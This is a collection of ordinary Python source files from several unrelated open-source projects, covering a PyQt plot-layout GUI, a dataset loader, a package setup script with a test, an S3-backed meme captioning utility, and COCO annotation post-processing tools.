def recalculate_visible_horizontal(self):
""" When a horizontal Slider is moved, see if it closed or opened
any boxes and change self.widgets_visible and update numbering.
This function essentially updates the contents of self.visible_widgets.
:return: None
"""
for i, vwidth in enumerate(self.vsplitter.sizes()):
if vwidth > 0: # ignore hidden rows
for j, hwidth in enumerate(self.vsplitter.widget(i).sizes()):
                    widget = self.widgets[(i * self.hcount) + j]  # row stride is the column count, as in the vertical variant
if hwidth == 0 and widget in self.visible_widgets:
self.visible_widgets.remove(widget)
elif hwidth != 0 and widget not in self.visible_widgets:
self.visible_widgets.append(widget)
self.label_frames()
def recalculate_visible_vertical(self):
""" When a vertical slider is moved see if it closed or opened any
rows and change the self.widgets_available and update the numbering.
This function essentially updates the contents of self.visible_widgets.
:return: None
"""
for i, vwidth in enumerate(self.vsplitter.sizes()):
if vwidth == 0:
# if the row is hidden, take the widget out of visible_widgets
for j in range(self.hcount):
widget = self.widgets[(i * self.hcount) + j]
if widget in self.visible_widgets:
self.visible_widgets.remove(widget)
else:
# otherwise, it might have been hidden and shown now so put
                # it back in visible_widgets, except if it has zero width
for j, hwidth in enumerate(self.vsplitter.widget(i).sizes()):
widget = self.widgets[(i * self.hcount) + j]
if hwidth > 0 and widget not in self.visible_widgets:
self.visible_widgets.append(widget)
self.label_frames()
def label_frames(self):
""" Put the frame numbering on each of the panels using their position in
self.visible_widgets and the ordering from self.widgets.
This function creates the numbering.
:return: None
"""
# A little bit clever here, instead of trying to always insert the widgets
# back into the visible_widgets in the correct order, we just sort them
# according to where they are in self.widgets which should be invariant
self.visible_widgets.sort(key=lambda x: self.widgets.index(x))
for i, widget in enumerate(self.visible_widgets):
widget.layout().itemAt(0).widget().setText("%s" % i)
def create_gridspec(self):
""" The plot that gets created will be configured with gridspec. In this
method, we create the height_ratios and width_ratios that will be used.
Note: height_ratios is an array, while width_ratios is an array of arrays,
each array corresponding to the panels in a height row.
:return: dict of height_ratios and width_ratios to use in mpl gridspec
"""
# TODO: snap features, close to 1/2 and 1/3 snap. Also within tolerance of other panels snap together
height_ratios = []
width_ratios = []
for i, vwidth in enumerate(self.vsplitter.sizes()):
if vwidth > 0:
height_ratios.append(vwidth)
width_ratio = []
for j, hwidth in enumerate(self.vsplitter.widget(i).sizes()):
if hwidth > 0:
width_ratio.append(hwidth)
width_ratios.append(width_ratio)
return {"height_ratios": height_ratios, "width_ratios": width_ratios}
class DimesnionChangeDialog(QDialog):
def __init__(self):
super(DimesnionChangeDialog, self).__init__()
self.layout = QFormLayout()
self.setLayout(self.layout)
# add the height width inputs
self.height = QSpinBox()
self.height.setMinimum(1)
self.layout.addRow("number ools", self.height)
self.width = QSpinBox()
self.width.setMinimum(1)
self.layout.addRow("number rows", self.width)
# add the cancel/Ok at bottom
buttonbox = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel,
Qt.Horizontal, self)
self.layout.addRow(buttonbox)
buttonbox.accepted.connect(self.accept)
buttonbox.rejected.connect(self.reject)
def get(self):
if self.exec_() == QDialog.Accepted:
return self.height.value(), self.width.value()
# For testing individual widget
if __name__ == "__main__":
import sys
from PyQt5.QtWidgets import QApplication
app = QApplication(sys.argv)
main = LayoutPicker()
main.show()
exit(app.exec_())
```
#### File: pyntpg/plot_tabs/main_widget.py
```python
from PyQt5.QtCore import QMutex
from PyQt5.QtWidgets import QTabWidget, QWidget, QTabBar, QLineEdit
from pyntpg.plot_tabs.plot_tab import PlotTab
from pyntpg.vertical_scroll_area import VerticalScrollArea
class PlotTabs(QTabWidget):
def __init__(self):
super(PlotTabs, self).__init__()
self.mutex = QMutex()
self.setTabBar(PlotTabBar())
scrollarea = VerticalScrollArea()
scrollarea.setWidget(PlotTab())
self.addTab(scrollarea, "plot")
# Add the "+" tab and make sure it has no close button
plus_tab = QWidget()
self.addTab(plus_tab, "+")
index = self.indexOf(plus_tab)
self.tabBar().setTabButton(index, QTabBar.RightSide, None)
self.currentChanged.connect(self.tab_changed)
self.tabCloseRequested.connect(self.close_tab)
def tab_changed(self, index):
maxindex = self.count() - 1
if ((index == maxindex or index == -1) and
self.mutex.tryLock()):
scrollarea = VerticalScrollArea()
scrollarea.setWidget(PlotTab())
self.insertTab(maxindex, scrollarea, "plot")
self.setCurrentIndex(maxindex)
self.mutex.unlock()
def close_tab(self, index):
if index == self.count() - 2:
self.setCurrentIndex(index - 1)
self.widget(index).deleteLater()
self.removeTab(index)
class PlotTabBar(QTabBar):
# credits of http://stackoverflow.com/a/30269356
def __init__(self):
super(PlotTabBar, self).__init__()
# Mutex to keep from editing another tab
# while one is already being edited
self.mutex = QMutex()
self.setTabsClosable(True)
def mouseDoubleClickEvent(self, event=None):
if event is not None:
tab_index = self.tabAt(event.pos())
else:
tab_index = self.currentIndex()
if self.mutex.tryLock() and tab_index != self.count() - 1:
self.start_rename(tab_index)
def start_rename(self, tab_index):
self.__edited_tab = tab_index
rect = self.tabRect(tab_index)
top_margin = 3
left_margin = 6
self.__edit = QLineEdit(self)
self.__edit.show()
self.__edit.move(rect.left() + left_margin, rect.top() + top_margin)
self.__edit.resize(rect.width() - 2 * left_margin, rect.height() - 2 * top_margin)
self.__edit.setText(self.tabText(tab_index))
self.__edit.selectAll()
self.__edit.setFocus()
self.__edit.editingFinished.connect(self.finish_rename)
def finish_rename(self):
self.setTabText(self.__edited_tab, self.__edit.text())
self.__edit.deleteLater()
self.mutex.unlock()
```
#### File: pyntpg/plot_tabs/plot_config_schema.py
```python
import cerberus
config_schema = {
"y-axis": {},
"z-axis": {},
}
def validate_config(schema, config):
"""
Ensure that the config dict contains at minimum, some set of expected key/value pairs.
Configure validation with self.base_config_schema. See [1] for schema documentation.
[1] http://docs.python-cerberus.org/en/stable/schemas.html
:type schema: dict
:param schema: Cerberus schema specifying validation.
:type config: dict
:param config: Configuration to be validated against schema.
:rtype: dict
:return: Validated configuration, possibly with type coerced.
"""
if schema is None:
return config
v = cerberus.Validator(schema, purge_unknown=False)
if v.validate(config):
return v.document
else:
raise ValueError(v.errors)
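
# Minimal usage sketch (illustrative schema and config, not part of the original module):
if __name__ == "__main__":
    example_schema = {"title": {"type": "string", "required": True}}
    print(validate_config(example_schema, {"title": "Panel 1"}))  # -> {'title': 'Panel 1'}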
``` |
{
"source": "5teffen/ViCE",
"score": 4
} |
#### File: ViCE/ViCE_pkg/data.py
```python
import pandas as pd
import numpy as np
class Data:
def __init__(self, path = '', data = None, target = -1, exception = [], categorical = [], example = ''):
if (example != ''):
# -- Available example datasets --
if (example == "diabetes"):
df = pd.read_csv("sample_data/diabetes.csv")
elif (example == "grad"):
df = pd.read_csv("sample_data/admissions.csv")
else:
raise ValueError("Unknown example dataset chosen")
self.feature_names = np.array(df.columns)[:-1]
all_data = np.array(df.values)
else:
            if ((data is None) and (path == '') and (example == '')):
raise ValueError("Should provide either a data array or the path to the data")
elif (data is None):
df = pd.read_csv(path)
self.feature_names = np.array(df.columns)[:-1]
all_data = np.array(df.values)
else:
all_data = np.array(data.values)
self.feature_names = np.array(data.columns)[:-1]
# -- Split data and target values --
self.y = all_data[:,target]
self.X = np.delete(all_data, target, 1)
# self.no_samples, self.no_features = self.data.shape
# -- Specifying exceptions & categoricals --
self.ex = exception
self.cat = categorical
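
# Minimal usage sketch (illustrative; assumes the bundled sample CSVs are available):
# d = Data(example="diabetes")                      # loads sample_data/diabetes.csv
# d = Data(path="my_data.csv", categorical=[2, 5])  # or load your own CSV (hypothetical file)
# print(d.feature_names, d.X.shape, d.y.shape)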
``` |
{
"source": "5thsymphony/sqlalchemy-to-ormar",
"score": 2
} |
#### File: 5thsymphony/sqlalchemy-to-ormar/setup.py
```python
import os
import re
from setuptools import setup
PACKAGE = "sqlalchemy-to-ormar"
URL = "https://github.com/collerek/sqlalchemy-to-ormar"
def get_version(package):
"""
Return package version as listed in `__version__` in `init.py`.
"""
package = package.replace("-", "_")
with open(os.path.join(package, "__init__.py")) as f:
return re.search("__version__ = ['\"]([^'\"]+)['\"]", f.read()).group(1)
def get_long_description():
"""
Return the README.
"""
with open("README.md", encoding="utf8") as f:
return f.read()
def get_packages(package):
"""
Return root package and all sub-packages.
"""
package = package.replace("-", "_")
return [
dirpath
for dirpath, dirnames, filenames in os.walk(package)
if os.path.exists(os.path.join(dirpath, "__init__.py"))
]
setup(
name=PACKAGE,
version=get_version(PACKAGE),
url=URL,
license="MIT",
description="A simple auto-translator from sqlalchemy ORM models to ormar models.",
long_description=get_long_description(),
long_description_content_type="text/markdown",
keywords=["orm", "sqlalchemy", "ormar", "databases", "async", "alembic"],
author="<NAME>",
author_email="<EMAIL>",
packages=get_packages(PACKAGE),
package_data={PACKAGE: ["py.typed"]},
include_package_data=True,
zip_safe=False,
python_requires=">=3.6",
data_files=[("", ["LICENSE.md"])],
install_requires=["ormar", "sqlalchemy>=1.3.18,<=1.3.23"],
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP",
"Framework :: AsyncIO",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3 :: Only",
],
)
```
#### File: sqlalchemy-to-ormar/tests/test_self_relation.py
```python
from databases import Database
from sqlalchemy import (
Column,
ForeignKey,
Integer,
MetaData,
String,
create_engine,
)
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy_to_ormar import sqlalchemy_to_ormar
Base = declarative_base()
Database_URL = "sqlite:///test.db"
engine = create_engine(Database_URL)
database = Database(Database_URL)
metadata = MetaData(engine)
class User(Base):
__tablename__ = "user"
USER_ID = Column(Integer(), primary_key=True)
FIRST_NAME = Column(String(255))
LAST_NAME = Column(String(255))
USERNAME = Column(String(255), index=True)
PASSWORD = Column(String(40))
EMAIL = Column(String(255))
PARENT_ID = Column(ForeignKey("user.USER_ID"), index=True) # type: ignore
parent = relationship("User", remote_side=[USER_ID])
def test_self_relation():
OrmarUser = sqlalchemy_to_ormar(User, database=database, metadata=metadata)
assert OrmarUser.extract_related_names() == {"parent", "users"}
``` |
{
"source": "5top1t/MemeTube",
"score": 3
} |
#### File: collage/meme/utils.py
```python
import os
import re
import datetime
import boto3
import botocore
from botocore.exceptions import ClientError
from pathlib import Path
from PIL import Image, ImageDraw, ImageFont
from dateutil.tz import tzlocal
from meme import (
constants,
settings
)
session = boto3.Session(profile_name=settings.AWS_PROFILE)
def meme_comment_to_frame(
meme_filename,
frame_filename,
comment,
font_style=constants.FONT_STYLE_DEFAULT,
font_size=constants.FONT_SIZE_DEFAULT,
font_fill=constants.FONT_FILL_DEFAULT,
bg_fill=constants.BG_FILL_DEFAULT,
bottom=constants.COMMENT_POSITION_DEFAULT,
test=settings.DEBUG
):
'''
Write a meme caption on the top or bottom of the frame. Save the result as a meme png.
Params:
    -- meme_filename {string} - Local path to store the combined frame and comment
-- frame_filename {string} - Local path to the YouTube screenshot frame
-- comment {string} - Meme caption
-- font_style {string} - Path to a ttf file for the font style
-- font_size {int} - Font size
-- font_fill {tuple{3}} - Color of the meme caption
-- bg_fill {tuple{4}} - Background color for the caption
    -- bottom {bool} - Position the caption on the bottom when True
-- test {bool} - Optional boolean used in testing
'''
try:
# Load file
im = Image.open(frame_filename)
W, H = im.size
# Format comment
caption, x, y = _comment_to_caption(comment, constants.COMMENT_WIDTH)
font = ImageFont.truetype(font_style, font_size)
# Compose a background
caption_border = 100
bg_width = W
bg_height = (font_size * y) + caption_border + H
im = _compose_image_with_background(
im, bg_width, bg_height, bg_fill=bg_fill, bottom=bottom)
# Add caption
draw = ImageDraw.Draw(im)
offset_w = (bg_width // 2) - (x // 2) * (font_size // 2) # center
offset_h = ((bg_height - H) // 2) - (y * (font_size // 2))
offset_h = H + offset_h if bottom else offset_h
offset = (offset_w, offset_h)
draw.text(offset, caption, fill=font_fill, font=font)
# Create a path and save the file
_validate_path(meme_filename)
if test:
im.show()
else:
im.save(meme_filename)
return True
except FileNotFoundError:
return False
def get_all_frames_from_s3(bucket, vtag):
'''
Gets a list images on s3 for a given youtube id.
Params:
-- bucket {string} - S3 bucket name
-- vtag {string} - YouTube vtag
'''
bucket = session.resource('s3').Bucket(bucket)
prefix = os.path.join(settings.AWS_FRAMES_DIR, vtag)
return [obj.key for obj in bucket.objects.filter(Prefix=prefix)]
def upload_meme_to_s3(bucket, filename, key):
'''
Uploads a meme from local dir to s3.
Params:
-- bucket {string} - S3 bucket name
-- filename {string} - Local filename for the s3 object
-- key {string} - Object prefix
'''
try:
if not _is_path_exists(filename):
return False
s3 = session.client('s3')
s3.upload_file(filename, bucket, key)
return True
except ClientError as e:
print(e)
# Not found
return False
def download_frame_from_s3(bucket, key, filename):
'''
Gets a frame from s3 and saves to settings.LOCAL_CLIP_DIR.
Params:
-- bucket {string} - S3 bucket name
-- key {string} - Object prefix
-- filename {string} - Local filename for the s3 object
'''
try:
if not _is_path_exists(filename):
_validate_path(filename)
s3 = session.client('s3')
s3.download_file(bucket, key, filename)
return True
except ClientError as e:
print(e)
# Not found
return False
def clean_local_artifacts(meme_filename, frame_filename):
'''
    Free up some memory by deleting unused images
Params:
-- meme_filename {string} - Local path to for meme png file
-- frame_filename {string} - Local path to the YouTube screenshot frame png file
'''
if _is_path_exists(meme_filename):
print('Recycling meme filename 🚮')
_delete_artifacts(meme_filename)
if _is_path_exists(frame_filename):
print('Recycling frame filename 🚮')
_delete_artifacts(frame_filename)
def _comment_to_caption(comment, max_width):
'''
Formats YouTube comment to be the meme caption.
Params:
-- comment {string} - YouTube comment.
-- max_width {int} - Max number of characters per line.
'''
curr_max_width = 0
curr_width = 0
curr_height = 1
if len(comment) > max_width:
caption = comment.split(' ')
for i in range(len(caption)):
caption[i] = caption[i].strip()
if curr_width + len(caption[i]) > max_width:
curr_max_width = curr_width if curr_width > curr_max_width else curr_max_width
curr_width = 0
curr_height += 1
caption[i] += '\n'
else:
curr_width += len(caption[i]) + 1 # word + space char
return ' '.join(caption), curr_max_width, curr_height
return comment, len(comment), curr_height
def _compose_image_with_background(
im,
bg_width,
bg_height,
bg_fill=constants.BG_FILL_DEFAULT,
bottom=constants.COMMENT_POSITION_DEFAULT
):
'''
Compose the YouTube frame with a background to write the text on
Params:
-- im {Image} - Local path to store combined frame and comment
-- bg_width {int} - Background width
-- bg_height {int} - Background height
-- bg_fill {tuple{4}} - Background color for the caption
    -- bottom {bool} - Position the caption background on the bottom when True
'''
background = Image.new(constants.COLOR_CHANNEL, (bg_width, bg_height), bg_fill)
# Create text space at top or bottom
bg_w, bg_h = background.size
offset_w = 0
offset_h = 0 if bottom else bg_h - im.height
offset = (offset_w, offset_h)
background.paste(im, offset)
return background
def _exists_object_on_s3(bucket, key):
'''
    Determines if an s3 object exists.
    Note: folders return 'false'; they are not objects.
Params:
-- bucket {string} - S3 bucket name
-- key {string} - Object prefix
'''
s3 = session.client('s3')
try:
s3.head_object(Bucket=bucket, Key=os.path.join(
settings.AWS_FRAMES_DIR, key))
return True
except ClientError as e:
# Not found
return False
def _validate_path(p):
folders = p.split('/')
folders.pop()
_create_dir('/'.join(folders))
def _delete_artifacts(d):
pth = Path(d)
pth.unlink(missing_ok=True)
folders = d.split('/')
folders.pop()
parent_dir = '/'.join(folders)
if _is_dir_empty(parent_dir):
_delete_dir(parent_dir)
def _create_dir(d):
try:
Path(d).mkdir(parents=True)
except FileExistsError:
pass
def _delete_dir(d):
pth = Path(d)
for child in pth.glob('*'):
if child.is_file():
child.unlink(missing_ok=True)
else:
_delete_dir(child)
pth.rmdir()
def _is_path_exists(p):
return Path(p).exists()
def _is_dir_empty(d):
return not any(Path(d).iterdir())
``` |
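A short sketch of how `meme_comment_to_frame` might be called; the file paths, bucket name, and comment text are made up for illustration, and `test=False` is passed explicitly so the result is saved even when `settings.DEBUG` is on:
```python
from meme.utils import meme_comment_to_frame, upload_meme_to_s3  # import path assumed

frame = "frames/dQw4w9WgXcQ/frame_0001.png"   # hypothetical local frame path
meme = "memes/dQw4w9WgXcQ/meme_0001.png"      # hypothetical output path
ok = meme_comment_to_frame(
    meme_filename=meme,
    frame_filename=frame,
    comment="when the tutorial skips the hard part",
    bottom=False,   # caption above the frame
    test=False,     # force saving instead of only showing the image
)
if ok:
    upload_meme_to_s3("my-meme-bucket", meme, "memes/dQw4w9WgXcQ/meme_0001.png")  # bucket name assumed
```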
{
"source": "5trobl/oaisys",
"score": 2
} |
#### File: oaisys/post_processing/annotation_writer.py
```python
import os
import sys
import warnings
import glob
import cv2
import numpy as np
from io_utils import PostprocessUtils
from io_utils import LabelFilter
class AnnotationWriter():
def __init__(self, cfg):
self.base_path = cfg.BASE_PATH
self.data_def = cfg.DATA_DEF[0]
self.batch_glob = cfg.BATCH_GLOB
self.sensors = cfg.SENSORS
self.channel_def = self._generate_channel_def()
self.out_path = os.path.join(self.base_path, cfg.OUT_FILE)
self.background = cfg.BACKGROUND
self.filters = cfg.FILTER[0]
self.data = {}
self.data_size = None
self.n_remaining_labels = 0
self.n_filtered_labels = 0
def run(self):
self._gather_sample_info()
print("Write Data ...")
self._write_data()
print(f"In total {self.data_size} samples processed. {self.n_remaining_labels} Labels remain while {self.n_filtered_labels} labels are filtered")
def _generate_channel_def(self):
channel_def = {}
for s in self.sensors:
_def = {**self.data_def["common"], **self.data_def[s]}
channel_def[s] = _def
return channel_def
def _gather_sample_info(self):
""" gathers all filenames of rendered images together """
print("searching for relevant files...")
b_dir = os.path.join(self.base_path, self.batch_glob)
batches = glob.glob(b_dir)
for sensor, s_def in self.channel_def.items():
sen_dict = {}
for channel, d in s_def.items():
ch_files = []
for b_path in batches:
#define path
g_str = d['glob']
in_dir = os.path.join(b_path, sensor, g_str) # assumption of path structure: base_path/[sensor]/[channel_glob]
_files = glob.glob(in_dir)
assert len(_files) != 0, "no files found here: " + in_dir
ch_files.extend(_files)
if not self.data_size:
self.data_size = len(ch_files)
else:
assert len(ch_files) == self.data_size, "different number of samples for: " + g_str
ch_files.sort() # ensure same ordering for all modalities
sen_dict[channel] = ch_files
self.data[sensor] = sen_dict
print(f"For sensor {sensor}, {self.data_size} data samples with following modalities found: {s_def.keys()}")
return
def _filter_data(self, data, label_key="inst_label"):
"applies label filter on data"
labels_orig = data[label_key]
# for statistical reasons
n_fil = 0
n_orig = np.unique(labels_orig).shape[0]
for _l in np.unique(labels_orig):
if _l != self.background:
                binary_mask = np.where(labels_orig == _l, 1, 0).astype(bool)
for _method_key, filter_cfg in self.filters.items():
filter_method = eval("LabelFilter."+_method_key)
is_filtered = filter_method(binary_mask, filter_cfg, data=data)
if is_filtered:
# if one method filters current binary mask, no need for further filters
labels_orig[binary_mask] = self.background
n_fil += 1
break
n_rem = np.unique(data[label_key]).shape[0]
assert n_orig == n_rem + n_fil
return data, n_rem, n_fil
def _write_data(self):
""" writes dictionary of data channels into file
"""
raise NotImplementedError("Please Implement this method")
return
def _load_image(self, image_path):
"""Load one image
Args:
image_path: path to image
width: desired width of returned image
height: desired heigt of returned image
chanels:
Returns:
image (np.array)
"""
image = cv2.imread(image_path, cv2.IMREAD_ANYCOLOR | cv2.IMREAD_ANYDEPTH)
return image
```
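The `FILTER` entries of the config map method names on `io_utils.LabelFilter` to keyword dictionaries; `_filter_data` looks each method up by name and blanks out every instance for which it returns `True`. The real implementation lives in `io_utils.py` and is not shown here, but a filter compatible with the call `filter_method(binary_mask, filter_cfg, data=data)` could look roughly like this (hypothetical re-implementation, for illustration only):
```python
import numpy as np

class LabelFilter:
    @staticmethod
    def filter_by_area(binary_mask, filter_cfg, data=None):
        """Filter (return True) if the instance covers fewer pixels than min_area."""
        return int(np.count_nonzero(binary_mask)) < filter_cfg["min_area"]
```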
#### File: oaisys/post_processing/coco_writer.py
```python
import os
import sys
import datetime
import numpy as np
import warnings
import glob
import cv2
import json
import yaml
from io_utils import CocoUtils, PostprocessUtils
from annotation_writer import AnnotationWriter
class CocoProcessor(AnnotationWriter):
def __init__(self, cfg):
super(CocoProcessor, self).__init__(cfg)
self.coco_data = None #TODO does this have to be a class member?
self.out_path = self.out_path + ".json"
self.tolerance = cfg.COCO.TOLERANCE
self.description = cfg.COCO.DESCRIPTION
self.supercategory = cfg.COCO.SUPERCATEGORY
self.reference_mod = cfg.COCO.REF_MODALITY
self.annotation_key = cfg.COCO.ANNOTATION_KEY
self.sensor_name = cfg.SENSORS
if len(self.sensor_name) == 1:
self.sensor_name = self.sensor_name[0]
else:
print("More than one sensor is specified for coco annotation")
sys.exit()
# is_crowd: defines if annotations describe single object(False) or a crowd/areas(True); single objects are encoded using with polygon, while crowds are encoded using column-major RLE (Run Length Encoding)
self.category_definitions = self._parse_category_definitions(cfg.COCO.CAT_DEFINITIONS_FILE)
self.inst2cat_key = cfg.COCO.INST2CAT if cfg.COCO.INST2CAT else self.annotation_key
self.instance_id_cnt = 0
def _parse_category_definitions(self, file_name):
with open(file_name, "r") as stream:
try:
cat_def = yaml.safe_load(stream)
except yaml.YAMLError as exc:
print(exc)
return cat_def
def _write_data(self):
image_key = self.reference_mod
annot_key = self.annotation_key
inst2cat_maps = self.data[self.sensor_name][self.inst2cat_key]
coco_data = self._generate_annotations(image_key, annot_key, self.category_definitions, inst2cat_key=self.inst2cat_key, dataset_description=self.description, supercategory=self.supercategory, tolerance=self.tolerance)
print("Coco annotations are written to: " + self.out_path)
with open(self.out_path, 'w') as fp:
json.dump(coco_data, fp)
return
def _generate_annotations(self, ref_key, annotation_key, category_definitions, dataset_description, inst2cat_key=None, supercategory=None, tolerance=2):
""" Generates coco annotations for rendered data
Args:
data:
image_paths: list of path strings pointing to the rendered images
annotation_maps: list of annotations maps;
category_definitions: dict(name:id) of all categories for current dataset;
inst2cat_key: dict mapping instance ids to category ids
dataset_description: name of dataset
supercategory: name of the supercategory; default description string
Return:
dict containing coco annotations
"""
if not supercategory:
supercategory = dataset_description
# TODO read this info from file?!
licenses = [
{
"id": 1,
"name": "Attribution-NonCommercial-ShareAlike License",
"url": "http://creativecommons.org/licenses/by-nc-sa/2.0/"
}
]
# TODO read this info from file?!
info = {
"description": dataset_description,
"url": "https://github.com/waspinator/pycococreator",
"version": "0.1.0",
"year": 2020,
"contributor": "<NAME>",
"date_created": datetime.datetime.utcnow().isoformat(' ')
}
# define categories
categories = []
for _id, _attr in category_definitions.items():
if _id != 0: # skip background
cat_dict = {
'id': int(_id),
'name': _attr['name'],
'supercategory': supercategory
}
categories.append(cat_dict) # NOTE do we have to check for duplicates?
imgs = []
annotations = []
for _id in range(0, self.data_size):
consider_sample = True
if _id % 200 == 0:
print(f"current data_sample: {_id}")
_data = {}
for key, val in self.data[self.sensor_name].items():
_map = self._load_image(val[_id])
#_data_def = self.data_def[self.sensor_name][key]
_data_def = self.channel_def[self.sensor_name][key]
if _data_def.get('post_process',False):
_map = PostprocessUtils.apply_postprocessing(_map, _data_def)
_data[key] = _map
# apply filters
_data, n_rem, n_fil = self._filter_data(_data)
self.n_remaining_labels += n_rem
self.n_filtered_labels += n_fil
_annot_map = _data[annotation_key]
_inst2cat_map = _data[inst2cat_key]
_ref_path = self.data[self.sensor_name][ref_key][_id] # reference path
_instances = np.unique(_annot_map)
tmp_annots = []
for inst in _instances:
if inst != 0 : # skip background
# binary object mask
inst_mask = np.where(_annot_map == inst, 1, 0).astype(np.float32)
if inst2cat_key: #NOTE later inst2cat might be None if only semantic labels are processed?!
cats = np.unique(inst_mask * _inst2cat_map)
if len(cats) != 2:
consider_sample = False
print(f"Something weired with the category labels is happening for {_ref_path}: cats are {len(cats)}")
break
cat_id = int(np.sort(cats)[-1])
else: #NOTE think about way to address this case
cat_id = 1
warnings.warn(f"No inst2cat map defined -> cat_id = 1")
                    if cat_id not in category_definitions:
                        warnings.warn(f"The category with id {cat_id} does not appear in the category definitions -> the category is set to category_id: 1")
                        cat_id = 1
cat_info = {
'id': cat_id,
'is_crowd': category_definitions[cat_id]['is_crowd']
}
# coco info for instance
annotation = CocoUtils.create_annotation_info(self.instance_id_cnt, _id, cat_info, inst_mask, tolerance)
self.instance_id_cnt += 1
if annotation is not None:
                        tmp_annots.append(annotation)
            # NOTE: minimal completion (layout assumed): register the reference image and keep
            # its annotations only if the sample was not discarded above.
            if consider_sample:
                _height, _width = _annot_map.shape[:2]
                imgs.append({
                    "id": _id,
                    "file_name": os.path.relpath(_ref_path, self.base_path),
                    "width": int(_width),
                    "height": int(_height),
                    "license": 1,
                })
                annotations.extend(tmp_annots)
coco_annotations = {
"info": info,
"licenses": licenses,
"categories": categories,
"images": imgs,
"annotations": annotations
}
return coco_annotations
```
#### File: oaisys/post_processing/default_config.py
```python
from yacs.config import CfgNode as CN
_C = CN(new_allowed=True)
###############
# General
###############
_C.FORMAT = "" # this defines the data format. it is recommended to leave this blank and define it via the cmd-line; ["coco", "hdf5"]
_C.BASE_PATH="" # absolute path to the rendered image batches
_C.BATCH_GLOB="batch_*" # common pattern of the batch folders; normally this is parameter does not have to be changed
_C.OUT_FILE = "annotations" # output file name without ending, since the file extension depends on the FORMAT
_C.SENSORS = ["sensor_1", "sensor_2"] # name of sensors which should be considered; if FORMAT=coco only one SENSOR is possible (still defined as list)
# channel definitions
# the "common" dict defines channels which are considered for every element,
# while the e.g. "rgbLeft" (note the key-name has to match the SENSOR name) have special channel definitions
#
# possible entries for data definitions
# e.g. "rgbLeft" :{
# [channel_name]: {
# "glob": [common pattern of related channel], # required for finding channel files
# "post_process": [post_processing name], # this is mainly for labels but can also be used to trim the depth maps; see also PostprocessUtils in io_utils.py, there also new post_processing methods can be defined;
# currently for label-channels: "post_process":"denoise_label" and for depth-channels: "post_process":"trim_channels"
# "num_classes": post_processing(denoise label) required parameter; please see cfg parameters maxInstanceLabelPerChannel(for instance labels) and num_labels_per_channel (for semantic labels)
# }
#}
_C.DATA_DEF = [{
'common': { # channels which are considered for every element in SENSOR list
"rgb":{"glob":"*rgb_00.png"},
},
'sensor_1':{ # specific channel definitions for SENSOR member rgbLeft
#"inst_label":{"post_process":"denoise_label", "num_classes": 51, "glob":"*instance_label*"},
#"sem_label":{"post_process":"denoise_label", "num_classes": 15, "glob":"*semantic_label*"},
#"pinhole_depth":{"glob":"*pinhole_depth_00.exr", "post_process":"trim_channels"},
#"euclidean_depth":{"glob":"*depth_euclidean.exr", "post_process":"trim_channels"},
},
'sensor_2':{}
}
]
_C.BACKGROUND = 0 # label ID which is considered as background
# FILTER definitions for the instance labels: key[method_name]:[method parameters]
# see also FilterLabels in io_utils.py
_C.FILTER = [{
"filter_by_area":{"min_area":40},
"filter_by_depth":{"depth_key": "pinhole_depth", "max_depth": 35, "thres_type":"avg"},
}]
def get_cfg_defaults():
"""Get a yacs CfgNode object with default values for my_project."""
# Return a clone so that the defaults will not be altered
# This is for the "local variable" use pattern
return _C.clone()
```
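A sketch of how these defaults might be consumed from a small driver script; the module import paths, the YAML file name, and the override values are assumptions, and the `COCO` sub-section read by `CocoProcessor` is expected to arrive through the merged YAML (`new_allowed=True` permits extra keys):
```python
from default_config import get_cfg_defaults   # import paths assumed
from coco_writer import CocoProcessor

cfg = get_cfg_defaults()
cfg.merge_from_file("my_dataset.yaml")         # hypothetical per-dataset overrides (incl. COCO section)
cfg.merge_from_list(["FORMAT", "coco", "BASE_PATH", "/data/renders"])
cfg.freeze()

writer = CocoProcessor(cfg)
writer.run()
```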
#### File: oaisys/scripts/coco_visualizer.py
```python
import argparse
import json
import os
from pycocotools import mask
import numpy as np
from PIL import Image, ImageFont, ImageDraw
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--file', dest='file', default='coco_annotations.json', help='coco annotation json file')
parser.add_argument('-i', '--image_index', dest='image_index', default=0, help='image over which to annotate, uses the rgb rendering', type=int)
parser.add_argument('-b', '--base_path', dest='base_path', default='examples/coco_annotations/output/coco_data', help='path to folder with coco_annotation.json and images', type=str)
parser.add_argument('--save', '-s', action='store_true', help='saves visualization of coco annotations under base_path/coco_annotated_x.png ')
parser.add_argument('--skip_vis', action='store_true', help='skips the visualization and only saves the annotated file')
args = parser.parse_args()
annot_file = args.file
image_idx = args.image_index
base_path = args.base_path
save = args.save
skip_vis = args.skip_vis
if skip_vis:
save = True
# Read coco_annotations config
with open(os.path.join(base_path, annot_file)) as f:
coco_data = json.load(f)
categories = coco_data["categories"]
annotations = coco_data["annotations"]
images = coco_data["images"]
for img_data in images:
if img_data["id"] == image_idx:
_path = os.path.join(base_path, img_data["file_name"])
#im_path = os.path.join(base_path, "img_{:04d}_rgb.png".format(image_idx))
img = Image.open(_path)
def get_category(_id):
category = [category["name"] for category in categories if category["id"] == _id]
if len(category) != 0:
return category[0]
else:
raise Exception("Category {} is not defined in {}".format(_id, os.path.join(base_path, annot_file)))
font = ImageFont.load_default()
# Add bounding boxes and masks
for idx, annotation in enumerate(annotations):
if annotation["image_id"] == image_idx:
draw = ImageDraw.Draw(img)
bb = annotation['bbox']
draw.rectangle(((bb[0], bb[1]), (bb[0] + bb[2], bb[1] + bb[3])), fill=None, outline="red")
#draw.text((bb[0] + 2, bb[1] + 2), get_category(annotation["category_id"]), font=font)
#if annotation["iscrowd"]:
if isinstance(annotation["segmentation"], dict):
img.putalpha(255)
an_sg = annotation["segmentation"]
            item = mask.decode(mask.frPyObjects(an_sg, img.size[1], img.size[0])).astype(np.uint8) * 255
            item = Image.fromarray(item, mode='L')
            overlay = Image.new('RGBA', img.size)
draw_ov = ImageDraw.Draw(overlay)
draw_ov.bitmap((0, 0), item, fill=(255, 0, 0, 128))
img = Image.alpha_composite(img, overlay)
else:
item = annotation["segmentation"][0]
poly = Image.new('RGBA', img.size)
pdraw = ImageDraw.Draw(poly)
